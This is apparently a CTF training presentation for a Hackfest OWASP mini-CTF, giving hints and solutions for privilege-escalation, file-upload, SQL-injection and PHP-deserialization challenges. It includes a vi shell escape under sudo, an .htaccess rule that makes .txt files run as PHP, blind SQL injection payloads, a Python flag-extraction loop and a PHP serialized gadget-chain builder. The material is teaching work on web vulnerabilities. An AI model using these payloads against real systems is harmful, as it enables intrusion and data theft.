Mini-CTF OWASP

What is it?

  • What is the Mini-CTF?
    • Short, entry-level challenges.
    • Designed to teach people about common web vulnerabilities.
    • A small competition run at the Hackfest.
  • 4 of them will be presented today.
    • File upload.
    • Deserialization.
    • Advanced SQL injection.
    • Privilege escalation.

Where ?

  • URL
    • https://owasp.zhack.ca
      • Privilege Escalation 2 / Privilege Escalation 1
      • Upload 2
      • SQL Injection 2
      • PHP Serialization 1
    • I usually keep the website up for 2-3 months after the CTF.
       
  • GitHub
    • https://github.com/HoLyVieR/Hackfest-MiniCTF-2017

Hints

 

  • Privilege Escalation 2 / Privilege Escalation 1
    • To launch
      • sudo -u admin COMMAND
  • Upload 2
    • PHP files are blocked by a .htaccess rule
    • You can upload more than one file into the same directory
    • Look for extensions or special files that are not blocked
  • SQL Injection 2
    • Look at what you can do with a sub-select
  • PHP Serialization 1
    • The "__destruct" method of an object is called automatically when the object is destroyed (at the latest, when the request ends). Find a way to chain this to reach a method that reads or writes a file.

Solutions

 

  • Privilege Escalation 2 / Privilege Escalation 1
    • :e flag.txt (ex/vi command: open the flag inside the editor launched through sudo)
    • (ESC) :!/bin/bash (ex/vi command: spawn a shell as the admin user from the editor)

Solutions

 

  • Upload 2
    • .htaccess + .txt file
      • AddType application/x-httpd-php .txt
      • The uploaded .htaccess makes Apache execute every .txt file in that directory as PHP, so the blocked .php extension is never needed
    • .htaccess shell
      • https://github.com/wireghoul/htshells/blob/master/shell/mod_php.shell.htaccess

Solutions

 

  • SQL Injection 2 (blind, boolean-based: the result of the sub-select is compared with LIKE, one character at a time)
    • True condition
      • aaaa"OR(SELECT(flag)FROM(flag))LIKE"F
      • aaaa"OR(SELECT(flag)FROM(flag))LIKE"FL
    • False condition
      • aaaa"OR(SELECT(flag)FROM(flag))LIKE"G
      • aaaa"OR(SELECT(flag)FROM(flag))LIKE"FK
    • Tabs can be used as whitespace instead of the parentheses
    • LIKE is case-insensitive under the usual default collations (e.g. MySQL), so a letter recovered this way could be in either case; "%" and "_" are LIKE wildcards and must not be used as guessed characters
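The extraction loop behind the true/false probes above, as an added example that is not from the slides or the challenge repository. It runs against an in-memory SQLite stand-in for the challenge database (the real backend is not named on the slides). Assumptions, all constructed for this example: a table `flag` with a column `flag` as the payloads imply, a sample flag value, and a vulnerable search query that quotes with single quotes and appends its own `%` to the LIKE pattern, which is what would make the slide's wildcard-free payloads work as prefix tests. The CTF's own query used double quotes, hence `aaaa"` on the slides.

```python
import sqlite3
import string

# Constructed sample flag; the real one is not on the slides.
SAMPLE_FLAG = "FLAG{SUB-SELECT-2017}"

# Characters guessed at each position. '%' and '_' are LIKE wildcards and
# would match anything, so they are deliberately absent from the alphabet.
ALPHABET = string.ascii_uppercase + string.digits + "{}-"


def build_db():
    """In-memory stand-in for the challenge database (assumed schema:
    table `flag`, column `flag`, plus a users table the app searches)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE flag (flag TEXT)")
    conn.execute("INSERT INTO flag VALUES (?)", (SAMPLE_FLAG,))
    conn.execute("CREATE TABLE users (name TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice')")
    return conn


def vulnerable_search(conn, user_input):
    """Hypothetical vulnerable endpoint: the input is concatenated into a
    LIKE pattern that the application itself terminates with '%'. That
    trailing '%' is an assumption; it explains why the slide's payloads
    carry no wildcard yet behave as prefix checks."""
    sql = "SELECT COUNT(*) FROM users WHERE name LIKE '" + user_input + "%'"
    return conn.execute(sql).fetchone()[0] > 0


def oracle(conn, prefix):
    """One boolean probe, in the shape of the slide's payload (no spaces,
    sub-select wrapped in parentheses): does the flag start with `prefix`?"""
    payload = "aaaa'OR(SELECT(flag)FROM(flag))LIKE'" + prefix
    return vulnerable_search(conn, payload)


def extract_flag(conn, alphabet=ALPHABET):
    """Recover the flag one character at a time; stop when no character
    in the alphabet extends the known prefix."""
    known = ""
    while True:
        for ch in alphabet:
            if oracle(conn, known + ch):
                known += ch
                break
        else:
            return known


if __name__ == "__main__":
    db = build_db()
    print(oracle(db, "F"), oracle(db, "G"))   # the slide's true/false pair
    print(extract_flag(db))
```

SQLite's LIKE is case-insensitive for ASCII, just like MySQL's default collations, so if the sample flag contained lowercase letters the loop would return them uppercase; resolving the case needs a case-sensitive comparison that the LIKE probe alone does not give.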

Solutions

 

  • Deserialization
    • Live demo!
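Crafting the payload for the chain the PHP Serialization hint describes, as an added example that is not from the slides, the demo or the challenge repository: a small Python implementation of PHP's serialize() format (public, protected and private property encoding included) and a hypothetical two-class gadget chain in the shape the hint gives, a __destruct that forwards to a property and a method that reads a file. The challenge's real class names are not on the slides; `Logger`, `FileDump`, `handler`, `entry` and `path` are made up here.

```python
from dataclasses import dataclass, field


@dataclass
class PHPObject:
    """A PHP object to serialize: class name and properties. Property names
    are given exactly as they appear in serialized form, so non-public
    properties go through protected_name()/private_name()."""
    cls: str
    props: dict = field(default_factory=dict)


def protected_name(name):
    # PHP encodes a protected property as "\0*\0name"; the NULs count
    # toward the s:N: byte length.
    return "\0*\0" + name


def private_name(cls, name):
    # A private property is encoded as "\0Class\0name".
    return "\0" + cls + "\0" + name


def php_serialize(value):
    """Emit the PHP serialize() representation of `value`.
    Handles None, bool, int, str, list (sequential array), dict, PHPObject."""
    if value is None:
        return "N;"
    if isinstance(value, bool):
        return "b:%d;" % int(value)
    if isinstance(value, int):
        return "i:%d;" % value
    if isinstance(value, str):
        # PHP counts bytes, not characters; the payload is sent as UTF-8.
        return 's:%d:"%s";' % (len(value.encode("utf-8")), value)
    if isinstance(value, (list, tuple)):
        items = "".join(php_serialize(i) + php_serialize(v)
                        for i, v in enumerate(value))
        return "a:%d:{%s}" % (len(value), items)
    if isinstance(value, dict):
        items = "".join(php_serialize(k) + php_serialize(v)
                        for k, v in value.items())
        return "a:%d:{%s}" % (len(value), items)
    if isinstance(value, PHPObject):
        body = "".join(php_serialize(k) + php_serialize(v)
                       for k, v in value.props.items())
        return 'O:%d:"%s":%d:{%s}' % (len(value.cls.encode("utf-8")),
                                      value.cls, len(value.props), body)
    raise TypeError("unsupported type: %r" % type(value))


def build_chain(target_path):
    """Hypothetical gadget chain (class and property names are made up):

      class Logger   { public $handler; public $entry;
                       function __destruct() { $this->handler->handle($this->entry); } }
      class FileDump { public $path;
                       function handle($e) { echo file_get_contents($this->path); } }

    unserialize() of the returned string builds a Logger whose handler is a
    FileDump; when the Logger is destroyed, __destruct() calls handle(), which
    reads $path."""
    dump = PHPObject("FileDump", {"path": target_path})
    return php_serialize(PHPObject("Logger", {"handler": dump, "entry": "x"}))


if __name__ == "__main__":
    print(build_chain("flag.txt"))
```

The property names must match the application's classes exactly, including the NUL-prefixed forms for protected and private members; a byte-length mismatch anywhere makes unserialize() fail before any __destruct runs.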